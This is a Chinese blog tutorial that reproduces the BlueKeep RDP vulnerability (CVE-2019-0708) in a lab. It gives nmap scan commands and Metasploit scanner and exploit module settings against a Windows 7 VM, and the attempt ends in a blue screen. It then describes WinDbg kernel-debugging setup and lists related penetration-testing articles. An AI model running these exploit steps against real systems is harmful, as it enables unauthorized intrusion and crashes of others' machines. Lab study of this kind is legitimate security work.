域渗透03-漏洞(CVE-2019-0708)

2023-10-11 19:30
文章标签 漏洞 03 2019 渗透 cve 0708

本文主要是介绍域渗透03-漏洞(CVE-2019-0708),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

漏洞简介:

        CVE-2019-0708只能针对以下版本系统,win7以后的系统不存在漏洞:

        Windows Server 2008 R2 、 Windows Server 2008 、Windows 2003 、 Windows XP。

        漏洞是通过RDP协议攻击,这就需要我们攻击的主机开放了远程桌面,一般就是3389端口,属于UAF堆溢出漏洞,漏洞存在与termdd.sys中,因为攻击的是内核,所以在攻击的时候如果配置选择错误,很容易导致蓝屏,所以在实战中一定要慎重操作。

漏洞复现:

靶机环境:

        win7:192.168.1.10

        vmware:17

        kali:192.168.1.5

首先使用在kali下使用nmap扫描win7靶机,首先扫描开放的端口,如果协议没扫出来,可以在根据结果进行协议全扫描,可以更好的识别端口对应的协议,另外加-O识别系统

nmap -p- --min-rate 2000 -sT 192.168.1.10
nmap -p 3389 --version-all -O 192.168.1.10

可以看到3389 协议rdp(ms-wbt-server),可以进行测试。由于在虚拟机,nmap识别的不是很准。

 测试漏洞是否存在:

        在找到靶机,且对外开放3389端口后,我们首先要测试漏洞是否存在,再考虑是否进行下一步的攻击:

msfconsole
reload_all
search 0708

 可以看到有两个,第一个poc,第二个是exp。

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep  
set rhosts 192.168.1.10
show options

 可以看到存在漏洞

利用:

        下面利用msf中之前搜索出来的exp尝试进行攻击

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.1.10
set target 1
set forceexploit true
show options

        其中 使用show target 可以查看攻击的平台,当攻击发现蓝屏的时候,可以通过这里进行查看找到和自己攻击系统相同的主机

        ​​​可以查看到配置信息

        执行漏洞 

        执行后发现蓝屏了,没有返回shell,很尴尬了,这一定是漏洞的地址有问题,调试下看看:

         

总结:

        这个漏洞因为是针对内核的攻击,不同系统版本的地址会有所不同,所以在利用的时候很容易造成蓝屏,在真实的渗透测试中这个还是很危险的,毕竟蓝屏了影响还是有点大的,所以这个可以用来作为研究,要是真的想进行攻击尝试,最好对应好系统版本在做尝试。

题外话调试测试:

 安装windbg:

首先安装windbag,下载地址:

x64
http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools_amd64/dbg_amd64.msi
x86
http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools/dbg_x86.msi

安装并添加双机调试:

  1. 选择【编辑虚拟机设置】,移除【打印机】
  2. 添加【串行端口】,在配置中选择【使用命名的管道】,输入\\.\pipe\com_1,第一个选择【该端是服务器】,另一个选择【另一端是应用程序】。勾选【轮询时主动放弃CPU】,点击【确定】
  3. 开启Windows 7,以管理员身份运行命令行,输入bcdedit /dbgsettings serial baudrate:115200 debugport:1 来设置端口com_1, baudrate为115200。
  4. 输入bcdedit /displayorder {current} {e8a0ccf0-9748-11eb-950a-ce6045b926ac} 在引导菜单中增加一个新的选项。 (注意:这里的{e8a0ccf0-9748-11eb-950a-ce6045b926ac}要输入你自己上一步生成的ID号)
  5. 输入bcdedit /debug {e8a0ccf0-9748-11eb-950a-ce6045b926ac} ON 来激活debug。 (这里的ID和上面的一样)
  6. 将WinDbg发送到桌面快捷方式,右击桌面上的快捷方式,点击【属性】,在目标中追加-b -k com:pipe,port=\\.\pipe\com_1,resets=0 (注意:如果之前的内容有双引号,要把追加内容放在双引号之后)
  7. 设置一个名为_NT_SYMBOL_PATH的系统变量,变量值设为srv*d:\ctftools\symbols*http://msdl.microsoft.com/download/symbols ,其中*d:\ctftools\symbols*是缓存符号表的位置,可以自己更改。
  8. 重新启动Windows 7 OS,开机时选择【DebugEntry】,同时打开WinDbg。

 调试:

        

这篇关于域渗透03-漏洞(CVE-2019-0708)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/190339

相关文章

SQL注入漏洞扫描之sqlmap详解

《SQL注入漏洞扫描之sqlmap详解》SQLMap是一款自动执行SQL注入的审计工具,支持多种SQL注入技术,包括布尔型盲注、时间型盲注、报错型注入、联合查询注入和堆叠查询注入... 目录what支持类型how---less-1为例1.检测网站是否存在sql注入漏洞的注入点2.列举可用数据库3.列举数据库

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

cross-plateform 跨平台应用程序-03-如果只选择一个框架,应该选择哪一个?

跨平台系列 cross-plateform 跨平台应用程序-01-概览 cross-plateform 跨平台应用程序-02-有哪些主流技术栈? cross-plateform 跨平台应用程序-03-如果只选择一个框架,应该选择哪一个? cross-plateform 跨平台应用程序-04-React Native 介绍 cross-plateform 跨平台应用程序-05-Flutte

FreeRTOS内部机制学习03(事件组内部机制)

文章目录 事件组使用的场景事件组的核心以及Set事件API做的事情事件组的特殊之处事件组为什么不关闭中断xEventGroupSetBitsFromISR内部是怎么做的? 事件组使用的场景 学校组织秋游,组长在等待: 张三:我到了 李四:我到了 王五:我到了 组长说:好,大家都到齐了,出发! 秋游回来第二天就要提交一篇心得报告,组长在焦急等待:张三、李四、王五谁先写好就交谁的

Vue day-03

目录 Vue常用特性 一.响应更新 1. 1 v-for更新监测 1.2 v-for就地更新 1.3 什么是虚拟DOM 1.4 diff算法更新虚拟DOM 总结:key值的作用和注意点: 二.过滤器 2.1 vue过滤器-定义使用 2.2 vue过滤器-传参和多过滤器 三. 计算属性(computed) 3.1 计算属性-定义使用 3.2 计算属性-缓存 3.3 计算属

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路

Java反序列化漏洞-TemplatesImpl利用链分析

文章目录 一、前言二、正文1. 寻找利用链2. 构造POC2.1 生成字节码2.2 加载字节码1)getTransletInstance2)defineTransletClasses 2.3 创建实例 3. 完整POC 三、参考文章 一、前言 java.lang.ClassLoader#defineClass defineClass可以加载字节码,但由于defineClas

【SpringMVC学习03】-SpringMVC的配置文件详解

在SpringMVC的各个组件中,处理器映射器、处理器适配器、视图解析器称为springmvc的三大组件。其实真正需要程序员开发的就两大块:一个是Handler,一个是jsp。 在springMVC的入门程序中,SpringMVC的核心配置文件——springmvc.xml为: <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http:

vulhub GhostScript 沙箱绕过(CVE-2018-16509)

1.执行以下命令启动靶场环境并在浏览器访问 cd vulhub/ghostscript/CVE-2018-16509 #进入漏洞环境所在目录   docker-compose up -d #启动靶场   docker ps #查看容器信息 2.访问网页 3.下载包含payload的png文件 vulhub/ghostscript/CVE-2018-16509/poc.png at

【工具分享】针对加解密综合利用后渗透工具 - DecryptTools

下载地址: 链接: https://pan.quark.cn/s/2e451bd65d79 工具介绍 支持22种OA、CMS 加解密+密码查询功能 万户OA用友NC金蝶EAS蓝凌OA致远OA宏景ERP湖南强智金和jc6 瑞友天翼金和C6 Navicat华天动力 FinalShell亿赛通帆软报表H3C CASWeblogic金蝶云星空新华三IMC金盘 OP